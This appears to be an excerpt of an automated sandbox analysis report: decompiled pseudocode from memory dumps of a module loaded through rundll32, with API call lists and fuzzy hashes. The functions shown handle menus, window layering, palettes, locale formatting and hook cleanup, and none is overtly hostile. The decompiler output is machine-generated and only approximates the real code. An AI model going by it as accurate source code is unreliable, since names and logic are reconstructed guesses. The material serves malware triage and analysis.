                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Desktop$IconicRelease
                          • String ID:
                          • API String ID: 1424704201-0
                          • Opcode ID: 475c11d3dcea8d65ae04c6f93e6a986b23160c1992f4a7409b4a5d60b38bcf94
                          • Instruction ID: e7642c356e31e13a6f276c50db3a18c25c451e18591a78d37765831833d20fd5
                          • Opcode Fuzzy Hash: 475c11d3dcea8d65ae04c6f93e6a986b23160c1992f4a7409b4a5d60b38bcf94
                          • Instruction Fuzzy Hash: B221C479A00108EFDB41EB98D994E9EBBF9EF49710F2140A5FA04DB351D735AE00DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0282378C(int __eax, void* __edx) {
                          				signed int _t39;
                          				signed int _t40;
                          				intOrPtr _t44;
                          				int _t46;
                          				int _t47;
                          				intOrPtr* _t48;
                          
                          				_t18 = __eax;
                          				_t48 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                          					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                          						 *((char*)(__eax + 0x74)) = 1;
                          						return __eax;
                          					}
                          					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                          					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                          						return E0282378C(_t19, __edx);
                          					}
                          					_t18 = GetMenuItemCount(E028238BC(__eax));
                          					_t47 = _t18;
                          					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                          					while(_t47 > 0) {
                          						_t46 = _t47 - 1;
                          						_t18 = GetMenuState(E028238BC(_t48), _t46, 0x400);
                          						if((_t18 & 0x00000004) == 0) {
                          							_t18 = RemoveMenu(E028238BC(_t48), _t46, 0x400);
                          							_t40 = 1;
                          						}
                          						_t47 = _t47 - 1;
                          					}
                          					if(_t40 != 0) {
                          						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                          							L14:
                          							E0282364C(_t48);
                          							L15:
                          							return  *((intOrPtr*)( *_t48 + 0x3c))();
                          						}
                          						_t44 =  *0x28222a0; // 0x28222ec
                          						if(E027D3398( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E028238BC(_t48)) != 0) {
                          							goto L14;
                          						} else {
                          							DestroyMenu( *(_t48 + 0x34));
                          							 *(_t48 + 0x34) = 0;
                          							goto L15;
                          						}
                          					}
                          				}
                          				return _t18;
                          			}










                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fca9c1ccf39dd3c2f539c5517633b3cdfef66eb323f029d821c11fe58350950
                          • Instruction ID: 207d71115aad1522f92dfbd83a0c4dd92b3fccce1b3fa5d29934d3789c8b9b4a
                          • Opcode Fuzzy Hash: 7fca9c1ccf39dd3c2f539c5517633b3cdfef66eb323f029d821c11fe58350950
                          • Instruction Fuzzy Hash: FD11876DB01339ABDB61BA3D992875A7AEE5F40744F0440E8BD05DF245DF2CCC8D8A51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 22%
                          			E02835824(void* __eax) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v16;
                          				intOrPtr* _t14;
                          				intOrPtr* _t17;
                          				intOrPtr _t19;
                          				intOrPtr* _t21;
                          				intOrPtr* _t26;
                          				intOrPtr _t37;
                          				void* _t39;
                          				intOrPtr _t47;
                          				void* _t49;
                          				void* _t51;
                          				intOrPtr _t52;
                          
                          				_t49 = _t51;
                          				_t52 = _t51 + 0xfffffff4;
                          				_t39 = __eax;
                          				if( *((short*)(__eax + 0x68)) == 0xffff) {
                          					return __eax;
                          				} else {
                          					_t14 =  *0x2864444; // 0x2865890
                          					_t17 =  *0x2864444; // 0x2865890
                          					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                          					_push(_t19);
                          					L027FEEB4();
                          					_v8 = _t19;
                          					_push(_t49);
                          					_push(0x28358e4);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t52;
                          					_t21 =  *0x2864774; // 0x2865b5c
                          					E027FEEEC(_v8, E0281C0D4( *_t21,  *((short*)(__eax + 0x68))));
                          					_t26 =  *0x2864774; // 0x2865b5c
                          					E027FEEEC(_v8, E0281C0D4( *_t26,  *((short*)(_t39 + 0x68))));
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(_v8);
                          					L027FEF44();
                          					_push( &_v16);
                          					_push(0);
                          					L027FEF54();
                          					_push(_v12);
                          					_push(_v16);
                          					_push(1);
                          					_push(_v8);
                          					L027FEF44();
                          					_pop(_t47);
                          					 *[fs:eax] = _t47;
                          					_push(0x28358eb);
                          					_t37 = _v8;
                          					_push(_t37);
                          					L027FEEBC();
                          					return _t37;
                          				}
                          			}


















                          APIs
                          • 74470BE0.COMCTL32(00000000), ref: 02835856
                            • Part of subcall function 027FEEEC: 74471180.COMCTL32(0282B7C2,000000FF,00000000,02835886,00000000,028358E4,?,00000000), ref: 027FEEF0
                          • 74470860.COMCTL32(0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358AA
                          • 744708D0.COMCTL32(00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358B5
                          • 74470860.COMCTL32(0282B7C2,00000001,?,0283594D,00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358C8
                          • 74471000.COMCTL32(0282B7C2,028358EB,0283594D,00000000,?,0282B7C2,00000000,00000000,00000000,00000000,028358E4,?,00000000), ref: 028358DE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 74470860$744707447087447100074471180
                          • String ID:
                          • API String ID: 2288716475-0
                          • Opcode ID: 993230848f2c2882b459b843d02a5cb0c17c6e006298673c39df45d04ae58881
                          • Instruction ID: bbcd738b267ccc540c21af9475b7728affdd5e228a31a5340f63b037574d80ed
                          • Opcode Fuzzy Hash: 993230848f2c2882b459b843d02a5cb0c17c6e006298673c39df45d04ae58881
                          • Instruction Fuzzy Hash: FB214F38B84204AFEB51EBA8DC85F6A73FDEB09700F510490FA04DB3A0D675AD00DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0281AE64(int __eax) {
                          				int _v8;
                          				signed char _v10;
                          				signed int _v12;
                          				int _t35;
                          
                          				_v8 = __eax;
                          				_t35 = _v8;
                          				if(( *(_t35 + 0x1c) & 0x00000010) == 0 &&  *0x2863c88 != 0) {
                          					_t35 = E02834254(_v8);
                          					if(_t35 != 0) {
                          						_v12 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
                          						if( *(_v8 + 0x2e0) != 0 ||  *(_v8 + 0x2e8) != 0) {
                          							if((_v10 & 0x00000008) == 0) {
                          								SetWindowLongA(E02833F7C(_v8), 0xffffffec, _v12 | 0x00080000);
                          							}
                          							_t35 =  *0x2863c88(E02833F7C(_v8),  *((intOrPtr*)(_v8 + 0x2ec)),  *((intOrPtr*)(_v8 + 0x2e1)),  *(0x2863d0c + ( *(_v8 + 0x2e0) & 0x000000ff) * 4) |  *(0x2863d14 + ( *(_v8 + 0x2e8) & 0x000000ff) * 4));
                          						} else {
                          							SetWindowLongA(E02833F7C(_v8), 0xffffffec, _v12 & 0xfff7ffff);
                          							_t35 = RedrawWindow(E02833F7C(_v8), 0, 0, 0x485);
                          						}
                          					}
                          				}
                          				return _t35;
                          			}








                          APIs
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0281AEA2
                          • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0281AEDC
                          • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 0281AF21
                          • SetWindowLongA.USER32(00000000,000000EC,?), ref: 0281AF3D
                          • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,?), ref: 0281AF54
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayeredRedraw
                          • String ID:
                          • API String ID: 1758778077-0
                          • Opcode ID: 32cbb84804e3ef97733ee5bbfb672d8f0f7c58b5df3775e83c028ef67ca7a61b
                          • Instruction ID: d5b9ebd717c06cf6fdffb2a6cfc7b865a751c262828fd76eeda058642ebc297e
                          • Opcode Fuzzy Hash: 32cbb84804e3ef97733ee5bbfb672d8f0f7c58b5df3775e83c028ef67ca7a61b
                          • Instruction Fuzzy Hash: 7B212A78908288AEDB05EBA8D989F9D7BF9AB05314F2405D0F558EB2D1C734EE40DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027FCC40(int __eax) {
                          				int _t21;
                          				signed int _t29;
                          				char _t34;
                          				int _t42;
                          				int _t43;
                          				struct HDC__* _t44;
                          				intOrPtr _t45;
                          
                          				_t21 = __eax;
                          				_t42 = __eax;
                          				_t45 =  *((intOrPtr*)(__eax + 0x28));
                          				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                          					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                          					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                          						E027FB5B4(_t22);
                          					}
                          					_t21 = E027F8FD4( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                          					_t43 = _t21;
                          					 *(_t45 + 0x10) = _t43;
                          					if(_t43 == 0) {
                          						_t44 = E027F88E4(GetDC(0));
                          						if( *((char*)(_t45 + 0x71)) != 0) {
                          							L9:
                          							_t34 = 1;
                          						} else {
                          							_t29 = GetDeviceCaps(_t44, 0xc);
                          							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                          								goto L9;
                          							} else {
                          								_t34 = 0;
                          							}
                          						}
                          						 *((char*)(_t45 + 0x71)) = _t34;
                          						if(_t34 != 0) {
                          							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                          						}
                          						_t21 = ReleaseDC(0, _t44);
                          						if( *(_t45 + 0x10) == 0) {
                          							 *((char*)(_t42 + 0x30)) = 1;
                          							return _t21;
                          						}
                          					}
                          				}
                          				return _t21;
                          			}











                          APIs
                          • GetDC.USER32(00000000), ref: 027FCC96
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                          • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$CreateHalftonePaletteRelease
                          • String ID:
                          • API String ID: 2404249990-0
                          • Opcode ID: 2e4c89e8bbe15d9984da0a8bc9f6e1d9b5e03117ec393588a5974e7e4e460989
                          • Instruction ID: 818561413c26a5a9b7a3ef5aab985bf9e42db723cccf01414919177978a76472
                          • Opcode Fuzzy Hash: 2e4c89e8bbe15d9984da0a8bc9f6e1d9b5e03117ec393588a5974e7e4e460989
                          • Instruction Fuzzy Hash: 2711E93164A29EAEDBA3EF34D4447EE369ABF41714F041116FE105A390D7B49990CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E027F8F3C(void* __eax) {
                          				char _v5;
                          				struct HDC__* _v12;
                          				struct HPALETTE__* _t21;
                          				struct HPALETTE__* _t25;
                          				void* _t28;
                          				intOrPtr _t35;
                          				void* _t37;
                          				void* _t39;
                          				intOrPtr _t40;
                          
                          				_t37 = _t39;
                          				_t40 = _t39 + 0xfffffff8;
                          				_t28 = __eax;
                          				_v5 = 0;
                          				if( *0x28658c8 == 0) {
                          					return _v5;
                          				} else {
                          					_v12 = GetDC(0);
                          					_push(_t37);
                          					_push(0x27f8fc2);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t40;
                          					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                          						_t21 =  *0x28658c8; // 0x570809f5
                          						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                          						_t25 =  *0x28658c8; // 0x570809f5
                          						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                          						_v5 = 1;
                          					}
                          					_pop(_t35);
                          					 *[fs:eax] = _t35;
                          					_push(0x27f8fc9);
                          					return ReleaseDC(0, _v12);
                          				}
                          			}













                          APIs
                          • GetDC.USER32(00000000), ref: 027F8F54
                          • GetDeviceCaps.GDI32(?,00000068), ref: 027F8F70
                          • GetPaletteEntries.GDI32(570809F5,00000000,00000008,?), ref: 027F8F88
                          • GetPaletteEntries.GDI32(570809F5,00000008,00000008,?), ref: 027F8FA0
                          • ReleaseDC.USER32(00000000,?), ref: 027F8FBC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPalette$CapsDeviceRelease
                          • String ID:
                          • API String ID: 3128150645-0
                          • Opcode ID: fffc87661a234298f0f7f1371c3f1b8abbfcecfdfe62ac02b7884e38d12a7121
                          • Instruction ID: a07c46ea83ef60af0190b1fd95035473462851289ef7093df5f3210b458fcadd
                          • Opcode Fuzzy Hash: fffc87661a234298f0f7f1371c3f1b8abbfcecfdfe62ac02b7884e38d12a7121
                          • Instruction Fuzzy Hash: 62112671A8C304BEFB41CBA8AC4AF697BFEE70A700F518491F644DB6C0DA7695448B21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E027DB690(void* __esi, void* __eflags) {
                          				char _v8;
                          				intOrPtr* _t18;
                          				intOrPtr _t26;
                          				void* _t27;
                          				long _t29;
                          				intOrPtr _t32;
                          				void* _t33;
                          
                          				_t33 = __eflags;
                          				_push(0);
                          				_push(_t32);
                          				_push(0x27db727);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t32;
                          				E027DB408(GetThreadLocale(), 0x27db73c, 0x100b,  &_v8);
                          				_t29 = E027D8620(0x27db73c, 1, _t33);
                          				if(_t29 + 0xfffffffd - 3 < 0) {
                          					EnumCalendarInfoA(E027DB5DC, GetThreadLocale(), _t29, 4);
                          					_t27 = 7;
                          					_t18 = 0x2865774;
                          					do {
                          						 *_t18 = 0xffffffff;
                          						_t18 = _t18 + 4;
                          						_t27 = _t27 - 1;
                          					} while (_t27 != 0);
                          					EnumCalendarInfoA(E027DB618, GetThreadLocale(), _t29, 3);
                          				}
                          				_pop(_t26);
                          				 *[fs:eax] = _t26;
                          				_push(E027DB72E);
                          				return E027D40E8( &_v8);
                          			}











                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,027DB727,?,?,00000000), ref: 027DB6A8
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027DB727,?,?,00000000), ref: 027DB6D8
                          • EnumCalendarInfoA.KERNEL32(Function_0000B5DC,00000000,00000000,00000004), ref: 027DB6E3
                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027DB727,?,?,00000000), ref: 027DB701
                          • EnumCalendarInfoA.KERNEL32(Function_0000B618,00000000,00000000,00000003), ref: 027DB70C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread$CalendarEnum
                          • String ID:
                          • API String ID: 4102113445-0
                          • Opcode ID: 45caef78b9233d4b54e53c3520f5d31e50c4adee547bf96a48ae0f4a2a823ca0
                          • Instruction ID: 1c120a69fd8993e2b2361f30a8a758fdc9e2470966c377cd09cc53d6f495be74
                          • Opcode Fuzzy Hash: 45caef78b9233d4b54e53c3520f5d31e50c4adee547bf96a48ae0f4a2a823ca0
                          • Instruction Fuzzy Hash: B10149796002046BF703BB74DC16F6A377DDB46B28F921260F111EA6C0DA74AF008E75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02801A00(intOrPtr _a4) {
                          				intOrPtr _t15;
                          				struct HMENU__* _t26;
                          
                          				_t15 =  *((intOrPtr*)(_a4 - 4));
                          				if( *((char*)(_t15 + 0x229)) != 0) {
                          					_t15 =  *((intOrPtr*)(_a4 - 4));
                          					if(( *(_t15 + 0x228) & 0x00000001) != 0) {
                          						_t15 =  *((intOrPtr*)(_a4 - 4));
                          						if( *((char*)(_t15 + 0x22f)) != 1) {
                          							_t26 = GetSystemMenu(E02833F7C( *((intOrPtr*)(_a4 - 4))), 0);
                          							DeleteMenu(_t26, 0xf130, 0);
                          							DeleteMenu(_t26, 0xf030, 0);
                          							DeleteMenu(_t26, 0xf020, 0);
                          							return DeleteMenu(_t26, 0xf120, 0);
                          						}
                          					}
                          				}
                          				return _t15;
                          			}






                          APIs
                          • GetSystemMenu.USER32(00000000,00000000), ref: 02801A3F
                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 02801A4E
                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A5B
                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A68
                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,0000F130,00000000,00000000,00000000), ref: 02801A75
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$Delete$System
                          • String ID:
                          • API String ID: 2163645685-0
                          • Opcode ID: 0482f923bd5760e3c272a9c917eee1c16a26cd4bb9e60003586fa1e86f427fd1
                          • Instruction ID: 908cc155ff001f2c7998134be288fa48b3f5d4e526856928efa2f123d3a527b1
                          • Opcode Fuzzy Hash: 0482f923bd5760e3c272a9c917eee1c16a26cd4bb9e60003586fa1e86f427fd1
                          • Instruction Fuzzy Hash: 1101FB743413057EE761E768DC8DF697EEDDB08758F0480A0B54C9F6E2C7B4B9808A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281CB70() {
                          				void* _t2;
                          				void* _t5;
                          				void* _t8;
                          				struct HHOOK__* _t10;
                          
                          				if( *0x2865b70 != 0) {
                          					_t10 =  *0x2865b70; // 0x0
                          					UnhookWindowsHookEx(_t10);
                          				}
                          				 *0x2865b70 = 0;
                          				if( *0x2865b74 != 0) {
                          					_t2 =  *0x2865b6c; // 0x0
                          					SetEvent(_t2);
                          					if(GetCurrentThreadId() !=  *0x2865b68) {
                          						_t8 =  *0x2865b74; // 0x0
                          						WaitForSingleObject(_t8, 0xffffffff);
                          					}
                          					_t5 =  *0x2865b74; // 0x0
                          					CloseHandle(_t5);
                          					 *0x2865b74 = 0;
                          					return 0;
                          				}
                          				return 0;
                          			}








                          APIs
                          • UnhookWindowsHookEx.USER32(00000000), ref: 0281CB7F
                          • SetEvent.KERNEL32(00000000,0281F46C,?,?,0281F2C3), ref: 0281CB9A
                          • GetCurrentThreadId.KERNEL32 ref: 0281CB9F
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0281F46C,?,?,0281F2C3), ref: 0281CBB4
                          • CloseHandle.KERNEL32(00000000,00000000,0281F46C,?,?,0281F2C3), ref: 0281CBBF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                          • String ID:
                          • API String ID: 2429646606-0
                          • Opcode ID: b7f7a398df9c230e07f8afe336a7b738c59ee36a1a7f43cf734b251265dcd814
                          • Instruction ID: 3248d5d6c800ce6382f17cb07131adfb3816d4e41611968981176ae39c79dba1
                          • Opcode Fuzzy Hash: b7f7a398df9c230e07f8afe336a7b738c59ee36a1a7f43cf734b251265dcd814
                          • Instruction Fuzzy Hash: 51F0AEFDD802169ACB11EBB8E88CA0933BDB708B15B842E16E214CB1C0DB3E9460CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E027DB740(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				char _v24;
                          				void* _t41;
                          				signed int _t45;
                          				signed int _t47;
                          				signed int _t49;
                          				signed int _t51;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t77;
                          				signed int _t83;
                          				signed int _t92;
                          				intOrPtr _t111;
                          				void* _t122;
                          				void* _t124;
                          				intOrPtr _t127;
                          				void* _t128;
                          
                          				_t128 = __eflags;
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_t122 = __edx;
                          				_t124 = __eax;
                          				_push(_t127);
                          				_push(0x27db90a);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t127;
                          				_t92 = 1;
                          				E027D40E8(__edx);
                          				E027DB408(GetThreadLocale(), 0x27db920, 0x1009,  &_v12);
                          				if(E027D8620(0x27db920, 1, _t128) + 0xfffffffd - 3 < 0) {
                          					while(1) {
                          						_t41 = E027D43A8(_t124);
                          						__eflags = _t92 - _t41;
                          						if(_t92 > _t41) {
                          							goto L28;
                          						}
                          						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                          						asm("bt [0x286311c], eax");
                          						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                          							_t45 = E027D8CC8(_t124 + _t92 - 1, 2, 0x27db924);
                          							__eflags = _t45;
                          							if(_t45 != 0) {
                          								_t47 = E027D8CC8(_t124 + _t92 - 1, 4, 0x27db934);
                          								__eflags = _t47;
                          								if(_t47 != 0) {
                          									_t49 = E027D8CC8(_t124 + _t92 - 1, 2, 0x27db94c);
                          									__eflags = _t49;
                          									if(_t49 != 0) {
                          										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                          										__eflags = _t51;
                          										if(_t51 == 0) {
                          											L24:
                          											E027D43B0(_t122, 0x27db964);
                          										} else {
                          											__eflags = _t51 != 0x20;
                          											if(_t51 != 0x20) {
                          												E027D42D0();
                          												E027D43B0(_t122, _v24);
                          											} else {
                          												goto L24;
                          											}
                          										}
                          									} else {
                          										E027D43B0(_t122, 0x27db958);
                          										_t92 = _t92 + 1;
                          									}
                          								} else {
                          									E027D43B0(_t122, 0x27db944);
                          									_t92 = _t92 + 3;
                          								}
                          							} else {
                          								E027D43B0(_t122, 0x27db930);
                          								_t92 = _t92 + 1;
                          							}
                          							_t92 = _t92 + 1;
                          							__eflags = _t92;
                          						} else {
                          							_v8 = E027DC800(_t124, _t92);
                          							E027D4608(_t124, _v8, _t92,  &_v20);
                          							E027D43B0(_t122, _v20);
                          							_t92 = _t92 + _v8;
                          						}
                          					}
                          				} else {
                          					_t75 =  *0x286574c; // 0x9
                          					_t76 = _t75 - 4;
                          					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                          						_t77 = 1;
                          					} else {
                          						_t77 = 0;
                          					}
                          					if(_t77 == 0) {
                          						E027D413C(_t122, _t124);
                          					} else {
                          						while(_t92 <= E027D43A8(_t124)) {
                          							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                          							__eflags = _t83;
                          							if(_t83 != 0) {
                          								__eflags = _t83 != 0x20;
                          								if(_t83 != 0x20) {
                          									E027D42D0();
                          									E027D43B0(_t122, _v16);
                          								}
                          							}
                          							_t92 = _t92 + 1;
                          							__eflags = _t92;
                          						}
                          					}
                          				}
                          				L28:
                          				_pop(_t111);
                          				 *[fs:eax] = _t111;
                          				_push(E027DB911);
                          				return E027D410C( &_v24, 4);
                          			}
























                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,027DB90A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027DB76F
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: eeee$ggg$yyyy
                          • API String ID: 4232894706-1253427255
                          • Opcode ID: bcae02b04c14dfd9a38bc2a24b5d7b9c0c7cc937aa6ecd4eebcb14d6a44924b3
                          • Instruction ID: 003136c7803e94015c87af1b1f6c9927067bb547c48f6ea433a880da19ddf49e
                          • Opcode Fuzzy Hash: bcae02b04c14dfd9a38bc2a24b5d7b9c0c7cc937aa6ecd4eebcb14d6a44924b3
                          • Instruction Fuzzy Hash: F241F225B041468BD712AAB8D8997BFBBB7DB5430CB562426D441E3304EB35E902CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
